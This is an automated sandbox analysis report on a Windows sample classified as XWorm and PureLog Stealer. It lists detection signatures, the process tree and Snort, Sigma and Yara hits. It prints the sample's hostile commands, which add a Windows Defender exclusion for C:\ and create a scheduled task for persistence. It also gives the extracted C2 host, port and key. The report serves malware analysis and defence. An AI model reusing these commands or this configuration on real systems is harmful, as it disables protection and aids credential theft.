Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
Analysis ID:1406161
MD5:f24a4d5b6036a3de2eba88868bd771f2
SHA1:3048d822d2b80d66284d1446052da0ba2be27d9e
SHA256:2c2f38b6679224281d1f9a0bee4ac5db26f845e0d0eb74c0caa2d994411ee7e2
Tags:exe
Infos:

Detection

PureLog Stealer, XWorm
Score:98
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected BrowserPasswordDump
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds extensions / path to Windows Defender exclusion list
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe (PID: 7476 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe MD5: F24A4D5B6036A3DE2EBA88868BD771F2)
    • cmd.exe (PID: 7552 cmdline: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7604 cmdline: powershell set-mppreference -exclusionpath C:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • Botmaster 5.8 direct.exe (PID: 8132 cmdline: "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe" MD5: C9C01FDC7D3AD84CEEB43C6B099A8AD5)
      • BotMaster.exe (PID: 6256 cmdline: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe MD5: 895F3A548FD8FA6FD1355AF6D218DA2C)
        • msedgewebview2.exe (PID: 6072 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=6256.5040.8042992908347816484 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 5064 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=117.0.5938.132 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=117.0.2045.47 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdfb488e88,0x7ffdfb488e98,0x7ffdfb488ea8 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 8128 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1736 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 3352 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2196 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:3 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 2252 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2488 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:8 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 4456 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6386081770 --mojo-platform-channel-handle=3380 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 7680 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6388632569 --mojo-platform-channel-handle=3928 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 7284 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6390330874 --mojo-platform-channel-handle=4280 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1 MD5: 9909D978B39FB7369F511D8506C17CA0)
          • msedgewebview2.exe (PID: 412 cmdline: "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4484 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2 MD5: 9909D978B39FB7369F511D8506C17CA0)
    • aspnet_compiler.exe (PID: 7180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • schtasks.exe (PID: 3120 cmdline: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 2640 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WinUpdate.exe (PID: 7632 cmdline: "C:\Users\user\AppData\Local\WinUpdate.exe" MD5: F24A4D5B6036A3DE2EBA88868BD771F2)
    • cmd.exe (PID: 7620 cmdline: "C:\Windows\SysWOW64\cmd.exe" /k START "" "C:\Users\user\AppData\Local\WinUpdate.exe" & EXIT MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WinUpdate.exe (PID: 7640 cmdline: "C:\Users\user\AppData\Local\WinUpdate.exe" MD5: F24A4D5B6036A3DE2EBA88868BD771F2)
        • cmd.exe (PID: 4464 cmdline: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5052 cmdline: powershell set-mppreference -exclusionpath C:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • Botmaster 5.8 direct.exe (PID: 1720 cmdline: "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe" MD5: C9C01FDC7D3AD84CEEB43C6B099A8AD5)
        • aspnet_compiler.exe (PID: 5868 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • XClient.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • XClient.exe (PID: 6348 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WinUpdate.exe (PID: 1644 cmdline: "C:\Users\user\AppData\Local\WinUpdate.exe" MD5: F24A4D5B6036A3DE2EBA88868BD771F2)
  • XClient.exe (PID: 344 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 8032 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XClient.exe (PID: 6644 cmdline: C:\Users\user\AppData\Roaming\XClient.exe MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["title-formula.at.ply.gg"], "Port": "15762", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002B.00000002.2511613578.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
        00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x163aa1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x163b13:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x163b9d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x163c2f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x163c99:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x163d0b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x163da1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x163e31:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
        00000022.00000002.2346424155.0000000002CD6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 23 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            43.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              9.2.aspnet_compiler.exe.7760000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                9.2.aspnet_compiler.exe.7760000.1.raw.unpackJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
                  9.2.aspnet_compiler.exe.7760000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x163aa1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x163b13:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x163b9d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x163c2f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x163c99:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x163d0b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x163da1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x163e31:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  Click to see the 9 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ParentProcessId: 7476, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\, ProcessId: 7552, ProcessName: cmd.exe
                  Sigma detected: AspNetCompiler Execution
                  Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ParentProcessId: 7476, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7180, ProcessName: aspnet_compiler.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\WinUpdate.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ProcessId: 7476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ParentProcessId: 7476, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\, ProcessId: 7552, ProcessName: cmd.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7180, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe, CommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 7180, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe, ProcessId: 3120, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell set-mppreference -exclusionpath C:\, CommandLine: powershell set-mppreference -exclusionpath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell set-mppreference -exclusionpath C:\, ProcessId: 7604, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 340, ProcessName: svchost.exe

                  Snort Signatures

                  Timestamp:03/10/24-17:32:22.814457
                  SID:2852923
                  Source Port:49734
                  Destination Port:15762
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:03/10/24-17:32:24.712981
                  SID:2852874
                  Source Port:15762
                  Destination Port:49734
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:03/10/24-17:30:45.329887
                  SID:2853192
                  Source Port:49734
                  Destination Port:15762
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:03/10/24-17:32:24.712981
                  SID:2852870
                  Source Port:15762
                  Destination Port:49734
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:03/10/24-17:32:06.998086
                  SID:2855924
                  Source Port:49734
                  Destination Port:15762
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://discovery.lenovo.com.cn/home062291Avira URL Cloud: Label: phishing
                  Found malware configuration
                  Source: 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["title-formula.at.ply.gg"], "Port": "15762", "Aes key": "<123456789>", "Install file": "USB.exe", "Version": "XWorm V5.0"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeReversingLabs: Detection: 50%
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeReversingLabs: Detection: 50%
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeVirustotal: Detection: 60%Perma Link
                  Machine Learning detection for sample
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeJoe Sandbox ML: detected

                  Bitcoin Miner

                  barindex
                  Found strings related to Crypto-Mining
                  Source: msedgewebview2.exe, 0000001D.00000002.3700963855.00002DDC00900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: jsecoin.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3700824624.00002DDC008D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coinhive.com/
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2196612181.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, BotMaster.exe, BotMaster.exe, 0000001A.00000002.3727126564.0000000006792000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: BotMaster.pdbPK source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053224069.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000013.00000002.2489538224.0000000002B50000.00000004.00000800.00020000.00000000.sdmp
